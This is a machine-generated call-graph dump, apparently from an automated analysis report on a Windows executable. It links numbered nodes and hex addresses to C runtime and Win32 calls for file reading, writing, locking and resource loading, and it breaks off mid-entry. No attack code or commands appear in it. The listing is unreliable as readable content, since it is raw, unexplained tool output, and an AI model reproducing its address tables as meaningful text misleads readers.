a43a0b 60 API calls 3 library calls 100368->100392 100370 a50a64 100370->100372 100393 a43a0b 60 API calls 3 library calls 100370->100393 100372->100359 100372->100364 100373->100329 100374->100339 100375->100339 100376->100339 100377->100339 100385 a49fb5 LeaveCriticalSection 100378->100385 100380 a50855 100380->100350 100381->100356 100382->100356 100383->100351 100384->100355 100385->100380 100394 a57fd5 100386->100394 100388 a5880a 100388->100363 100389->100361 100390->100363 100391->100368 100392->100370 100393->100372 100397 a57fe1 _doexit 100394->100397 100395 a57ff7 100479 a48d68 58 API calls __getptd_noexit 100395->100479 100397->100395 100399 a5802d 100397->100399 100398 a57ffc 100480 a48ff6 9 API calls __read_nolock 100398->100480 100405 a5809e 100399->100405 100402 a58049 100481 a58072 LeaveCriticalSection __unlock_fhandle 100402->100481 100404 a58006 _doexit 100404->100388 100406 a580be 100405->100406 100407 a4471a __wsopen_nolock 58 API calls 100406->100407 100410 a580da 100407->100410 100408 a49006 __invoke_watson 8 API calls 100409 a587f0 100408->100409 100412 a57fd5 __wsopen_helper 103 API calls 100409->100412 100411 a58114 100410->100411 100415 a58137 100410->100415 100428 a58211 100410->100428 100413 a48d34 __read_nolock 58 API calls 100411->100413 100414 a5880a 100412->100414 100416 a58119 100413->100416 100414->100402 100419 a581f5 100415->100419 100427 a581d3 100415->100427 100417 a48d68 __recalloc 58 API calls 100416->100417 100418 a58126 100417->100418 100420 a48ff6 __read_nolock 9 API calls 100418->100420 100421 a48d34 __read_nolock 58 API calls 100419->100421 100422 a58130 100420->100422 100423 a581fa 100421->100423 100422->100402 100424 a48d68 __recalloc 58 API calls 100423->100424 100425 a58207 100424->100425 100426 a48ff6 __read_nolock 9 API calls 100425->100426 100426->100428 100429 a4d4d4 __alloc_osfhnd 61 API calls 100427->100429 100428->100408 100430 a582a1 100429->100430 100431 a582ce 100430->100431 100432 a582ab 100430->100432 100434 a57f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100431->100434 100433 a48d34 __read_nolock 58 API calls 100432->100433 100435 a582b0 100433->100435 100445 a582f0 100434->100445 100436 a48d68 __recalloc 58 API calls 100435->100436 100438 a582ba 100436->100438 100437 a5836e GetFileType 100439 a58379 GetLastError 100437->100439 100440 a583bb 100437->100440 100443 a48d68 __recalloc 58 API calls 100438->100443 100444 a48d47 __dosmaperr 58 API calls 100439->100444 100449 a4d76a __set_osfhnd 59 API calls 100440->100449 100441 a5833c GetLastError 100442 a48d47 __dosmaperr 58 API calls 100441->100442 100446 a58361 100442->100446 100443->100422 100447 a583a0 CloseHandle 100444->100447 100445->100437 100445->100441 100448 a57f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100445->100448 100452 a48d68 __recalloc 58 API calls 100446->100452 100447->100446 100450 a583ae 100447->100450 100451 a58331 100448->100451 100456 a583d9 100449->100456 100453 a48d68 __recalloc 58 API calls 100450->100453 100451->100437 100451->100441 100452->100428 100454 a583b3 100453->100454 100454->100446 100455 a58594 100455->100428 100458 a58767 CloseHandle 100455->100458 100456->100455 100457 a51b11 __lseeki64_nolock 60 API calls 100456->100457 100472 a5845a 100456->100472 100459 a58443 100457->100459 100460 a57f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100458->100460 100462 a48d34 __read_nolock 58 API calls 100459->100462 100459->100472 100461 a5878e 100460->100461 100463 a58796 GetLastError 100461->100463 100464 a587c2 100461->100464 100462->100472 100465 a48d47 __dosmaperr 58 API calls 100463->100465 100464->100428 100467 a587a2 100465->100467 100466 a5848c 100470 a599f2 __chsize_nolock 82 API calls 100466->100470 100466->100472 100471 a4d67d __free_osfhnd 59 API calls 100467->100471 100468 a510ab 70 API calls __read_nolock 100468->100472 100469 a50d2d __close_nolock 61 API calls 100469->100472 100470->100466 100471->100464 100472->100455 100472->100466 100472->100468 100472->100469 100473 a4dac6 __write 78 API calls 100472->100473 100474 a58611 100472->100474 100475 a51b11 60 API calls __lseeki64_nolock 100472->100475 100473->100472 100476 a50d2d __close_nolock 61 API calls 100474->100476 100475->100472 100477 a58618 100476->100477 100478 a48d68 __recalloc 58 API calls 100477->100478 100478->100428 100479->100398 100480->100404 100481->100404 100483 a24ce1 100482->100483 100484 a24d9d LoadLibraryA 100482->100484 100483->100284 100483->100285 100484->100483 100485 a24dae GetProcAddress 100484->100485 100485->100483 100487 a40ff6 Mailbox 59 API calls 100486->100487 100488 a253a0 100487->100488 100488->100292 100490 a25003 FindResourceExW 100489->100490 100494 a25020 100489->100494 100491 a5dd5c LoadResource 100490->100491 100490->100494 100492 a5dd71 SizeofResource 100491->100492 100491->100494 100493 a5dd85 LockResource 100492->100493 100492->100494 100493->100494 100494->100293 100496 a5ddd4 100495->100496 100497 a25054 100495->100497 100501 a45a7d 100497->100501 100499 a25062 100499->100300 100500->100293 100504 a45a89 _doexit 100501->100504 100502 a45a9b 100514 a48d68 58 API calls __getptd_noexit 100502->100514 100504->100502 100505 a45ac1 100504->100505 100516 a46e4e 100505->100516 100507 a45aa0 100515 a48ff6 9 API calls __read_nolock 100507->100515 100508 a45ac7 100522 a459ee 83 API calls 4 library calls 100508->100522 100511 a45aab _doexit 100511->100499 100512 a45ad6 100523 a45af8 LeaveCriticalSection LeaveCriticalSection _fseek 100512->100523 100514->100507 100515->100511 100517 a46e80 EnterCriticalSection 100516->100517 100518 a46e5e 100516->100518 100519 a46e76 100517->100519 100518->100517 100520 a46e66 100518->100520 100519->100508 100521 a49e4b __lock 58 API calls 100520->100521 100521->100519 100522->100512 100523->100511 100527 a4582d 100524->100527 100526 a2508e 100526->100312 100528 a45839 _doexit 100527->100528 100529 a4587c 100528->100529 100530 a4584f _memset 100528->100530 100531 a45874 _doexit 100528->100531 100532 a46e4e __lock_file 59 API calls 100529->100532 100554 a48d68 58 API calls __getptd_noexit 100530->100554 100531->100526 100534 a45882 100532->100534 100540 a4564d 100534->100540 100535 a45869 100555 a48ff6 9 API calls __read_nolock 100535->100555 100543 a45668 _memset 100540->100543 100546 a45683 100540->100546 100541 a45673 100652 a48d68 58 API calls __getptd_noexit 100541->100652 100543->100541 100543->100546 100551 a456c3 100543->100551 100544 a45678 100653 a48ff6 9 API calls __read_nolock 100544->100653 100556 a458b6 LeaveCriticalSection LeaveCriticalSection _fseek 100546->100556 100548 a457d4 _memset 100655 a48d68 58 API calls __getptd_noexit 100548->100655 100551->100546 100551->100548 100557 a44916 100551->100557 100564 a510ab 100551->100564 100632 a50df7 100551->100632 100654 a50f18 58 API calls 4 library calls 100551->100654 100554->100535 100555->100531 100556->100531 100558 a44935 100557->100558 100559 a44920 100557->100559 100558->100551 100656 a48d68 58 API calls __getptd_noexit 100559->100656 100561 a44925 100657 a48ff6 9 API calls __read_nolock 100561->100657 100563 a44930 100563->100551 100565 a510e3 100564->100565 100566 a510cc 100564->100566 100568 a5181b 100565->100568 100573 a5111d 100565->100573 100667 a48d34 58 API calls __getptd_noexit 100566->100667 100683 a48d34 58 API calls __getptd_noexit 100568->100683 100570 a510d1 100668 a48d68 58 API calls __getptd_noexit 100570->100668 100571 a51820 100684 a48d68 58 API calls __getptd_noexit 100571->100684 100574 a51125 100573->100574 100581 a5113c 100573->100581 100669 a48d34 58 API calls __getptd_noexit 100574->100669 100577 a51131 100685 a48ff6 9 API calls __read_nolock 100577->100685 100578 a5112a 100670 a48d68 58 API calls __getptd_noexit 100578->100670 100580 a51151 100671 a48d34 58 API calls __getptd_noexit 100580->100671 100581->100580 100584 a5116b 100581->100584 100585 a51189 100581->100585 100612 a510d8 100581->100612 100584->100580 100587 a51176 100584->100587 100672 a48a5d 58 API calls 2 library calls 100585->100672 100658 a55ebb 100587->100658 100588 a51199 100590 a511a1 100588->100590 100591 a511bc 100588->100591 100673 a48d68 58 API calls __getptd_noexit 100590->100673 100675 a51b11 60 API calls 3 library calls 100591->100675 100592 a5128a 100594 a51303 ReadFile 100592->100594 100599 a512a0 GetConsoleMode 100592->100599 100597 a51325 100594->100597 100598 a517e3 GetLastError 100594->100598 100596 a511a6 100674 a48d34 58 API calls __getptd_noexit 100596->100674 100597->100598 100605 a512f5 100597->100605 100601 a512e3 100598->100601 100602 a517f0 100598->100602 100603 a512b4 100599->100603 100604 a51300 100599->100604 100615 a512e9 100601->100615 100676 a48d47 58 API calls 3 library calls 100601->100676 100681 a48d68 58 API calls __getptd_noexit 100602->100681 100603->100604 100607 a512ba ReadConsoleW 100603->100607 100604->100594 100614 a515c7 100605->100614 100605->100615 100617 a5135a 100605->100617 100607->100605 100608 a512dd GetLastError 100607->100608 100608->100601 100610 a517f5 100682 a48d34 58 API calls __getptd_noexit 100610->100682 100612->100551 100613 a42f95 _free 58 API calls 100613->100612 100614->100615 100620 a516cd ReadFile 100614->100620 100615->100612 100615->100613 100616 a51447 100616->100615 100622 a51504 100616->100622 100623 a514f4 100616->100623 100626 a514b4 MultiByteToWideChar 100616->100626 100617->100616 100619 a513c6 ReadFile 100617->100619 100621 a513e7 GetLastError 100619->100621 100628 a513f1 100619->100628 100624 a516f0 GetLastError 100620->100624 100631 a516fe 100620->100631 100621->100628 100622->100626 100679 a51b11 60 API calls 3 library calls 100622->100679 100678 a48d68 58 API calls __getptd_noexit 100623->100678 100624->100631 100626->100608 100626->100615 100628->100617 100677 a51b11 60 API calls 3 library calls 100628->100677 100631->100614 100680 a51b11 60 API calls 3 library calls 100631->100680 100633 a50e02 100632->100633 100637 a50e17 100632->100637 100719 a48d68 58 API calls __getptd_noexit 100633->100719 100635 a50e07 100720 a48ff6 9 API calls __read_nolock 100635->100720 100638 a50e4c 100637->100638 100643 a50e12 100637->100643 100721 a56234 58 API calls __malloc_crt 100637->100721 100640 a44916 __flush 58 API calls 100638->100640 100641 a50e60 100640->100641 100686 a50f97 100641->100686 100643->100551 100644 a50e67 100644->100643 100645 a44916 __flush 58 API calls 100644->100645 100646 a50e8a 100645->100646 100646->100643 100647 a44916 __flush 58 API calls 100646->100647 100648 a50e96 100647->100648 100648->100643 100649 a44916 __flush 58 API calls 100648->100649 100650 a50ea3 100649->100650 100651 a44916 __flush 58 API calls 100650->100651 100651->100643 100652->100544 100653->100546 100654->100551 100655->100544 100656->100561 100657->100563 100659 a55ec6 100658->100659 100661 a55ed3 100658->100661 100660 a48d68 __recalloc 58 API calls 100659->100660 100662 a55ecb 100660->100662 100663 a55edf 100661->100663 100664 a48d68 __recalloc 58 API calls 100661->100664 100662->100592 100663->100592 100665 a55f00 100664->100665 100666 a48ff6 __read_nolock 9 API calls 100665->100666 100666->100662 100667->100570 100668->100612 100669->100578 100670->100577 100671->100578 100672->100588 100673->100596 100674->100612 100675->100587 100676->100615 100677->100628 100678->100615 100679->100626 100680->100631 100681->100610 100682->100615 100683->100571 100684->100577 100685->100612 100687 a50fa3 _doexit 100686->100687 100688 a50fc7 100687->100688 100689 a50fb0 100687->100689 100690 a5108b 100688->100690 100693 a50fdb 100688->100693 100691 a48d34 __read_nolock 58 API calls 100689->100691 100694 a48d34 __read_nolock 58 API calls 100690->100694 100692 a50fb5 100691->100692 100695 a48d68 __recalloc 58 API calls 100692->100695 100696 a51006 100693->100696 100697 a50ff9 100693->100697 100698 a50ffe 100694->100698 100707 a50fbc _doexit 100695->100707 100700 a51013 100696->100700 100701 a51028 100696->100701 100699 a48d34 __read_nolock 58 API calls 100697->100699 100703 a48d68 __recalloc 58 API calls 100698->100703 100699->100698 100704 a48d34 __read_nolock 58 API calls 100700->100704 100702 a4d446 ___lock_fhandle 59 API calls 100701->100702 100705 a5102e 100702->100705 100706 a51020 100703->100706 100708 a51018 100704->100708 100709 a51054 100705->100709 100710 a51041 100705->100710 100713 a48ff6 __read_nolock 9 API calls 100706->100713 100707->100644 100711 a48d68 __recalloc 58 API calls 100708->100711 100714 a48d68 __recalloc 58 API calls 100709->100714 100712 a510ab __read_nolock 70 API calls 100710->100712 100711->100706 100715 a5104d 100712->100715 100713->100707 100716 a51059 100714->100716 100718 a51083 __read LeaveCriticalSection 100715->100718 100717 a48d34 __read_nolock 58 API calls 100716->100717 100717->100715 100718->100707 100719->100635 100720->100643 100721->100638 100725 a4543a GetSystemTimeAsFileTime 100722->100725 100724 a891f8 100724->100314 100726 a45468 __aulldiv 100725->100726 100726->100724 100728 a45e9c _doexit 100727->100728 100729 a45ec3 100728->100729 100730 a45eae 100728->100730 100732 a46e4e __lock_file 59 API calls 100729->100732 100741 a48d68 58 API calls __getptd_noexit 100730->100741 100734 a45ec9 100732->100734 100733 a45eb3 100742 a48ff6 9 API calls __read_nolock 100733->100742 100743 a45b00 67 API calls 7 library calls 100734->100743 100737 a45ed4 100744 a45ef4 LeaveCriticalSection LeaveCriticalSection _fseek 100737->100744 100739 a45ebe _doexit 100739->100319 100740 a45ee6 100740->100739 100741->100733 100742->100739 100743->100737 100744->100740 100745->100208 100746->100210 100747->100207 100748->100220 100749->100219 100752 a899d2 __tzset_nolock _wcscmp 100750->100752 100751 a2506b 74 API calls 100751->100752 100752->100751 100753 a89393 GetSystemTimeAsFileTime 100752->100753 100754 a89866 100752->100754 100755 a25045 85 API calls 100752->100755 100753->100752 100754->100226 100754->100255 100755->100752 100757 a88da9 100756->100757 100758 a88d9b 100756->100758 100760 a88dee 100757->100760 100761 a4548b 115 API calls 100757->100761 100786 a88db2 100757->100786 100759 a4548b 115 API calls 100758->100759 100759->100757 100787 a8901b 100760->100787 100763 a88dd3 100761->100763 100763->100760 100765 a88ddc 100763->100765 100764 a88e32 100766 a88e57 100764->100766 100769 a88e36 100764->100769 100767 a455d6 __fcloseall 83 API calls 100765->100767 100765->100786 100791 a88c33 100766->100791 100767->100786 100770 a88e43 100769->100770 100772 a455d6 __fcloseall 83 API calls 100769->100772 100775 a455d6 __fcloseall 83 API calls 100770->100775 100770->100786 100772->100770 100773 a88e85 100800 a88eb5 100773->100800 100774 a88e65 100776 a88e72 100774->100776 100778 a455d6 __fcloseall 83 API calls 100774->100778 100775->100786 100780 a455d6 __fcloseall 83 API calls 100776->100780 100776->100786 100778->100776 100780->100786 100783 a88ea0 100785 a455d6 __fcloseall 83 API calls 100783->100785 100783->100786 100785->100786 100786->100254 100788 a89040 100787->100788 100790 a89029 __tzset_nolock _memmove 100787->100790 100789 a45812 __fread_nolock 74 API calls 100788->100789 100789->100790 100790->100764 100792 a4594c __crtCompareStringA_stat 58 API calls 100791->100792 100793 a88c42 100792->100793 100794 a4594c __crtCompareStringA_stat 58 API calls 100793->100794 100795 a88c56 100794->100795 100796 a4594c __crtCompareStringA_stat 58 API calls 100795->100796 100797 a88c6a 100796->100797 100798 a88f97 58 API calls 100797->100798 100799 a88c7d 100797->100799 100798->100799 100799->100773 100799->100774 100807 a88eca 100800->100807 100801 a88f82 100829 a891bf 100801->100829 100802 a88c8f 74 API calls 100802->100807 100804 a88e8c 100808 a88f97 100804->100808 100807->100801 100807->100802 100807->100804 100833 a88d2b 74 API calls 100807->100833 100834 a8909c 80 API calls 100807->100834 100809 a88fa4 100808->100809 100812 a88faa 100808->100812 100810 a42f95 _free 58 API calls 100809->100810 100810->100812 100811 a88fbb 100814 a88e93 100811->100814 100815 a42f95 _free 58 API calls 100811->100815 100812->100811 100813 a42f95 _free 58 API calls 100812->100813 100813->100811 100814->100783 100816 a455d6 100814->100816 100815->100814 100817 a455e2 _doexit 100816->100817 100818 a455f6 100817->100818 100819 a4560e 100817->100819 100916 a48d68 58 API calls __getptd_noexit 100818->100916 100822 a45606 _doexit 100819->100822 100823 a46e4e __lock_file 59 API calls 100819->100823 100821 a455fb 100917 a48ff6 9 API calls __read_nolock 100821->100917 100822->100783 100825 a45620 100823->100825 100900 a4556a 100825->100900 100830 a891cc 100829->100830 100831 a891dd 100829->100831 100835 a44a93 100830->100835 100831->100804 100833->100807 100834->100807 100836 a44a9f _doexit 100835->100836 100837 a44ad5 100836->100837 100838 a44abd 100836->100838 100840 a44acd _doexit 100836->100840 100841 a46e4e __lock_file 59 API calls 100837->100841 100860 a48d68 58 API calls __getptd_noexit 100838->100860 100840->100831 100843 a44adb 100841->100843 100842 a44ac2 100861 a48ff6 9 API calls __read_nolock 100842->100861 100848 a4493a 100843->100848 100849 a44967 100848->100849 100852 a44949 100848->100852 100862 a44b0d LeaveCriticalSection LeaveCriticalSection _fseek 100849->100862 100850 a44957 100891 a48d68 58 API calls __getptd_noexit 100850->100891 100852->100849 100852->100850 100859 a44981 _memmove 100852->100859 100853 a4495c 100892 a48ff6 9 API calls __read_nolock 100853->100892 100857 a44916 __flush 58 API calls 100857->100859 100859->100849 100859->100857 100863 a4dac6 100859->100863 100893 a44c6d 100859->100893 100899 a4b05e 78 API calls 7 library calls 100859->100899 100860->100842 100861->100840 100862->100840 100864 a4dad2 _doexit 100863->100864 100865 a4daf6 100864->100865 100866 a4dadf 100864->100866 100867 a4db95 100865->100867 100870 a4db0a 100865->100870 100868 a48d34 __read_nolock 58 API calls 100866->100868 100871 a48d34 __read_nolock 58 API calls 100867->100871 100869 a4dae4 100868->100869 100872 a48d68 __recalloc 58 API calls 100869->100872 100873 a4db32 100870->100873 100874 a4db28 100870->100874 100875 a4db2d 100871->100875 100876 a4daeb _doexit 100872->100876 100878 a4d446 ___lock_fhandle 59 API calls 100873->100878 100877 a48d34 __read_nolock 58 API calls 100874->100877 100880 a48d68 __recalloc 58 API calls 100875->100880 100876->100859 100877->100875 100879 a4db38 100878->100879 100881 a4db5e 100879->100881 100882 a4db4b 100879->100882 100883 a4dba1 100880->100883 100884 a48d68 __recalloc 58 API calls 100881->100884 100885 a4dbb5 __write_nolock 76 API calls 100882->100885 100886 a48ff6 __read_nolock 9 API calls 100883->100886 100887 a4db63 100884->100887 100888 a4db57 100885->100888 100886->100876 100889 a48d34 __read_nolock 58 API calls 100887->100889 100890 a4db8d __write LeaveCriticalSection 100888->100890 100889->100888 100890->100876 100891->100853 100892->100849 100894 a44c80 100893->100894 100895 a44ca4 100893->100895 100894->100895 100896 a44916 __flush 58 API calls 100894->100896 100895->100859 100897 a44c9d 100896->100897 100898 a4dac6 __write 78 API calls 100897->100898 100898->100895 100899->100859 100901 a4558d 100900->100901 100902 a45579 100900->100902 100903 a45589 100901->100903 100905 a44c6d __flush 78 API calls 100901->100905 100949 a48d68 58 API calls __getptd_noexit 100902->100949 100918 a45645 LeaveCriticalSection LeaveCriticalSection _fseek 100903->100918 100907 a45599 100905->100907 100906 a4557e 100950 a48ff6 9 API calls __read_nolock 100906->100950 100919 a50dc7 100907->100919 100911 a44916 __flush 58 API calls 100912 a455a7 100911->100912 100923 a50c52 100912->100923 100914 a455ad 100914->100903 100915 a42f95 _free 58 API calls 100914->100915 100915->100903 100916->100821 100917->100822 100918->100822 100920 a455a1 100919->100920 100921 a50dd4 100919->100921 100920->100911 100921->100920 100922 a42f95 _free 58 API calls 100921->100922 100922->100920 100924 a50c5e _doexit 100923->100924 100925 a50c82 100924->100925 100926 a50c6b 100924->100926 100928 a50d0d 100925->100928 100930 a50c92 100925->100930 100975 a48d34 58 API calls __getptd_noexit 100926->100975 100980 a48d34 58 API calls __getptd_noexit 100928->100980 100929 a50c70 100976 a48d68 58 API calls __getptd_noexit 100929->100976 100933 a50cb0 100930->100933 100934 a50cba 100930->100934 100977 a48d34 58 API calls __getptd_noexit 100933->100977 100951 a4d446 100934->100951 100935 a50cb5 100981 a48d68 58 API calls __getptd_noexit 100935->100981 100939 a50cc0 100941 a50cd3 100939->100941 100942 a50cde 100939->100942 100940 a50d19 100982 a48ff6 9 API calls __read_nolock 100940->100982 100960 a50d2d 100941->100960 100978 a48d68 58 API calls __getptd_noexit 100942->100978 100945 a50c77 _doexit 100945->100914 100947 a50cd9 100979 a50d05 LeaveCriticalSection __unlock_fhandle 100947->100979 100949->100906 100950->100903 100952 a4d452 _doexit 100951->100952 100953 a4d4a1 EnterCriticalSection 100952->100953 100955 a49e4b __lock 58 API calls 100952->100955 100954 a4d4c7 _doexit 100953->100954 100954->100939 100956 a4d477 100955->100956 100957 a4d48f 100956->100957 100983 a4a06b InitializeCriticalSectionAndSpinCount 100956->100983 100984 a4d4cb LeaveCriticalSection _doexit 100957->100984 100985 a4d703 100960->100985 100962 a50d91 100998 a4d67d 59 API calls 2 library calls 100962->100998 100963 a50d3b 100963->100962 100964 a50d6f 100963->100964 100966 a4d703 __lseeki64_nolock 58 API calls 100963->100966 100964->100962 100967 a4d703 __lseeki64_nolock 58 API calls 100964->100967 100969 a50d66 100966->100969 100970 a50d7b FindCloseChangeNotification 100967->100970 100968 a50d99 100971 a50dbb 100968->100971 100999 a48d47 58 API calls 3 library calls 100968->100999 100973 a4d703 __lseeki64_nolock 58 API calls 100969->100973 100970->100962 100974 a50d87 GetLastError 100970->100974 100971->100947 100973->100964 100974->100962 100975->100929 100976->100945 100977->100935 100978->100947 100979->100945 100980->100935 100981->100940 100982->100945 100983->100957 100984->100953 100986 a4d723 100985->100986 100987 a4d70e 100985->100987 100990 a48d34 __read_nolock 58 API calls 100986->100990 100992 a4d748 100986->100992 100988 a48d34 __read_nolock 58 API calls 100987->100988 100989 a4d713 100988->100989 100991 a48d68 __recalloc 58 API calls 100989->100991 100993 a4d752 100990->100993 100994 a4d71b 100991->100994 100992->100963 100995 a48d68 __recalloc 58 API calls 100993->100995 100994->100963 100996 a4d75a 100995->100996 100997 a48ff6 __read_nolock 9 API calls 100996->100997 100997->100994 100998->100968 100999->100971 101062 a51b90 101000->101062 101003 a248f7 101064 a27eec 101003->101064 101004 a248da 101005 a27d2c 59 API calls 101004->101005 101007 a248e6 101005->101007 101008 a27886 59 API calls 101007->101008 101009 a248f2 101008->101009 101010 a409d5 101009->101010 101011 a51b90 __write_nolock 101010->101011 101012 a409e2 GetLongPathNameW 101011->101012 101013 a27d2c 59 API calls 101012->101013 101014 a2741d 101013->101014 101015 a2716b 101014->101015 101016 a277c7 59 API calls 101015->101016 101017 a2717d 101016->101017 101018 a248ae 60 API calls 101017->101018 101019 a27188 101018->101019 101020 a27193 101019->101020 101021 a5ecae 101019->101021 101022 a23f84 59 API calls 101020->101022 101025 a5ecc8 101021->101025 101074 a27a68 61 API calls 101021->101074 101024 a2719f 101022->101024 101068 a234c2 101024->101068 101027 a271b2 Mailbox 101027->100041 101029 a24f3d 136 API calls 101028->101029 101030 a269ef 101029->101030 101031 a5e45a 101030->101031 101032 a24f3d 136 API calls 101030->101032 101033 a897e5 122 API calls 101031->101033 101034 a26a03 101032->101034 101035 a5e46f 101033->101035 101034->101031 101038 a26a0b 101034->101038 101036 a5e490 101035->101036 101037 a5e473 101035->101037 101040 a40ff6 Mailbox 59 API calls 101036->101040 101039 a24faa 84 API calls 101037->101039 101041 a26a17 101038->101041 101042 a5e47b 101038->101042 101039->101042 101061 a5e4d5 Mailbox 101040->101061 101075 a26bec 101041->101075 101191 a84534 90 API calls _wprintf 101042->101191 101045 a5e489 101045->101036 101047 a5e689 101048 a42f95 _free 58 API calls 101047->101048 101049 a5e691 101048->101049 101050 a24faa 84 API calls 101049->101050 101055 a5e69a 101050->101055 101054 a42f95 _free 58 API calls 101054->101055 101055->101054 101057 a24faa 84 API calls 101055->101057 101193 a7fcb1 89 API calls 4 library calls 101055->101193 101057->101055 101058 a27f41 59 API calls 101058->101061 101061->101047 101061->101055 101061->101058 101168 a7fc4d 101061->101168 101171 a87621 101061->101171 101177 a2766f 101061->101177 101185 a274bd 101061->101185 101192 a7fb6e 61 API calls 2 library calls 101061->101192 101063 a248bb GetFullPathNameW 101062->101063 101063->101003 101063->101004 101065 a27f06 101064->101065 101067 a27ef9 101064->101067 101066 a40ff6 Mailbox 59 API calls 101065->101066 101066->101067 101067->101007 101069 a234d4 101068->101069 101073 a234f3 _memmove 101068->101073 101072 a40ff6 Mailbox 59 API calls 101069->101072 101070 a40ff6 Mailbox 59 API calls 101071 a2350a 101070->101071 101071->101027 101072->101073 101073->101070 101074->101021 101076 a5e847 101075->101076 101077 a26c15 101075->101077 101266 a7fcb1 89 API calls 4 library calls 101076->101266 101199 a25906 60 API calls Mailbox 101077->101199 101080 a26c37 101200 a25956 67 API calls 101080->101200 101081 a5e85a 101267 a7fcb1 89 API calls 4 library calls 101081->101267 101083 a26c4c 101083->101081 101084 a26c54 101083->101084 101086 a277c7 59 API calls 101084->101086 101088 a26c60 101086->101088 101087 a5e876 101116 a26cc1 101087->101116 101201 a40b9b 60 API calls __write_nolock 101088->101201 101090 a5e889 101093 a25dcf CloseHandle 101090->101093 101091 a26ccf 101094 a277c7 59 API calls 101091->101094 101092 a26c6c 101095 a277c7 59 API calls 101092->101095 101096 a5e895 101093->101096 101097 a26cd8 101094->101097 101098 a26c78 101095->101098 101099 a24f3d 136 API calls 101096->101099 101100 a277c7 59 API calls 101097->101100 101101 a248ae 60 API calls 101098->101101 101103 a5e8b1 101099->101103 101104 a26ce1 101100->101104 101102 a26c86 101101->101102 101202 a259b0 ReadFile SetFilePointerEx 101102->101202 101106 a5e8da 101103->101106 101109 a897e5 122 API calls 101103->101109 101204 a246f9 101104->101204 101268 a7fcb1 89 API calls 4 library calls 101106->101268 101108 a26cb2 101203 a25c4e SetFilePointerEx SetFilePointerEx 101108->101203 101113 a5e8cd 101109->101113 101110 a26cf8 101114 a27c8e 59 API calls 101110->101114 101117 a5e8d5 101113->101117 101118 a5e8f6 101113->101118 101119 a26d09 SetCurrentDirectoryW 101114->101119 101115 a5e8f1 101146 a26e6c Mailbox 101115->101146 101116->101090 101116->101091 101121 a24faa 84 API calls 101117->101121 101120 a24faa 84 API calls 101118->101120 101124 a26d1c Mailbox 101119->101124 101122 a5e8fb 101120->101122 101121->101106 101123 a40ff6 Mailbox 59 API calls 101122->101123 101130 a5e92f 101123->101130 101126 a40ff6 Mailbox 59 API calls 101124->101126 101128 a26d2f 101126->101128 101127 a23bcd 101127->99908 101127->99931 101129 a2538e 59 API calls 101128->101129 101157 a26d3a Mailbox __NMSG_WRITE 101129->101157 101131 a2766f 59 API calls 101130->101131 101163 a5e978 Mailbox 101131->101163 101132 a26e47 101262 a25dcf 101132->101262 101135 a5eb69 101271 a87581 59 API calls Mailbox 101135->101271 101136 a26e53 SetCurrentDirectoryW 101136->101146 101139 a5eb8b 101272 a8f835 59 API calls 2 library calls 101139->101272 101142 a5eb98 101143 a42f95 _free 58 API calls 101142->101143 101143->101146 101144 a5ec02 101275 a7fcb1 89 API calls 4 library calls 101144->101275 101194 a25934 101146->101194 101148 a2766f 59 API calls 101148->101163 101149 a5ec1b 101149->101132 101151 a5ebfa 101274 a7fb07 59 API calls 4 library calls 101151->101274 101154 a27f41 59 API calls 101154->101157 101156 a7fc4d 59 API calls 101156->101163 101157->101132 101157->101144 101157->101151 101157->101154 101255 a259cd 67 API calls _wcscpy 101157->101255 101256 a270bd GetStringTypeW 101157->101256 101257 a2702c 60 API calls __wcsnicmp 101157->101257 101258 a2710a GetStringTypeW __NMSG_WRITE 101157->101258 101259 a4387d GetStringTypeW _iswctype 101157->101259 101260 a26a3c 165 API calls 3 library calls 101157->101260 101261 a27373 59 API calls Mailbox 101157->101261 101158 a27f41 59 API calls 101158->101163 101160 a87621 59 API calls 101160->101163 101162 a5ebbb 101273 a7fcb1 89 API calls 4 library calls 101162->101273 101163->101135 101163->101148 101163->101156 101163->101158 101163->101160 101163->101162 101269 a7fb6e 61 API calls 2 library calls 101163->101269 101270 a27373 59 API calls Mailbox 101163->101270 101165 a5ebd4 101166 a42f95 _free 58 API calls 101165->101166 101167 a5ebe7 101166->101167 101167->101146 101169 a40ff6 Mailbox 59 API calls 101168->101169 101170 a7fc7d _memmove 101169->101170 101170->101061 101172 a8762c 101171->101172 101173 a40ff6 Mailbox 59 API calls 101172->101173 101174 a87643 101173->101174 101175 a27f41 59 API calls 101174->101175 101176 a87652 101174->101176 101175->101176 101176->101061 101178 a2770f 101177->101178 101181 a27682 _memmove 101177->101181 101180 a40ff6 Mailbox 59 API calls 101178->101180 101179 a40ff6 Mailbox 59 API calls 101182 a27689 101179->101182 101180->101181 101181->101179 101183 a40ff6 Mailbox 59 API calls 101182->101183 101184 a276b2 101182->101184 101183->101184 101184->101061 101186 a274d0 101185->101186 101188 a2757e 101185->101188 101187 a40ff6 Mailbox 59 API calls 101186->101187 101190 a27502 101186->101190 101187->101190 101188->101061 101189 a40ff6 59 API calls Mailbox 101189->101190 101190->101188 101190->101189 101191->101045 101192->101061 101193->101055 101195 a25dcf CloseHandle 101194->101195 101196 a2593c Mailbox 101195->101196 101197 a25dcf CloseHandle 101196->101197 101198 a2594b 101197->101198 101198->101127 101199->101080 101200->101083 101201->101092 101202->101108 101203->101116 101205 a277c7 59 API calls 101204->101205 101206 a2470f 101205->101206 101207 a277c7 59 API calls 101206->101207 101208 a24717 101207->101208 101209 a277c7 59 API calls 101208->101209 101210 a2471f 101209->101210 101211 a277c7 59 API calls 101210->101211 101212 a24727 101211->101212 101213 a2475b 101212->101213 101214 a5d8fb 101212->101214 101215 a279ab 59 API calls 101213->101215 101216 a281a7 59 API calls 101214->101216 101217 a24769 101215->101217 101218 a5d904 101216->101218 101219 a27e8c 59 API calls 101217->101219 101220 a27eec 59 API calls 101218->101220 101221 a24773 101219->101221 101222 a2479e 101220->101222 101221->101222 101223 a279ab 59 API calls 101221->101223 101225 a247bd 101222->101225 101237 a5d924 101222->101237 101241 a247de 101222->101241 101224 a24794 101223->101224 101227 a27e8c 59 API calls 101224->101227 101229 a27b52 59 API calls 101225->101229 101226 a279ab 59 API calls 101230 a247ef 101226->101230 101227->101222 101228 a5d9f4 101232 a27d2c 59 API calls 101228->101232 101233 a247c7 101229->101233 101231 a24801 101230->101231 101234 a281a7 59 API calls 101230->101234 101235 a24811 101231->101235 101236 a281a7 59 API calls 101231->101236 101250 a5d9b1 101232->101250 101240 a279ab 59 API calls 101233->101240 101233->101241 101234->101231 101239 a24818 101235->101239 101242 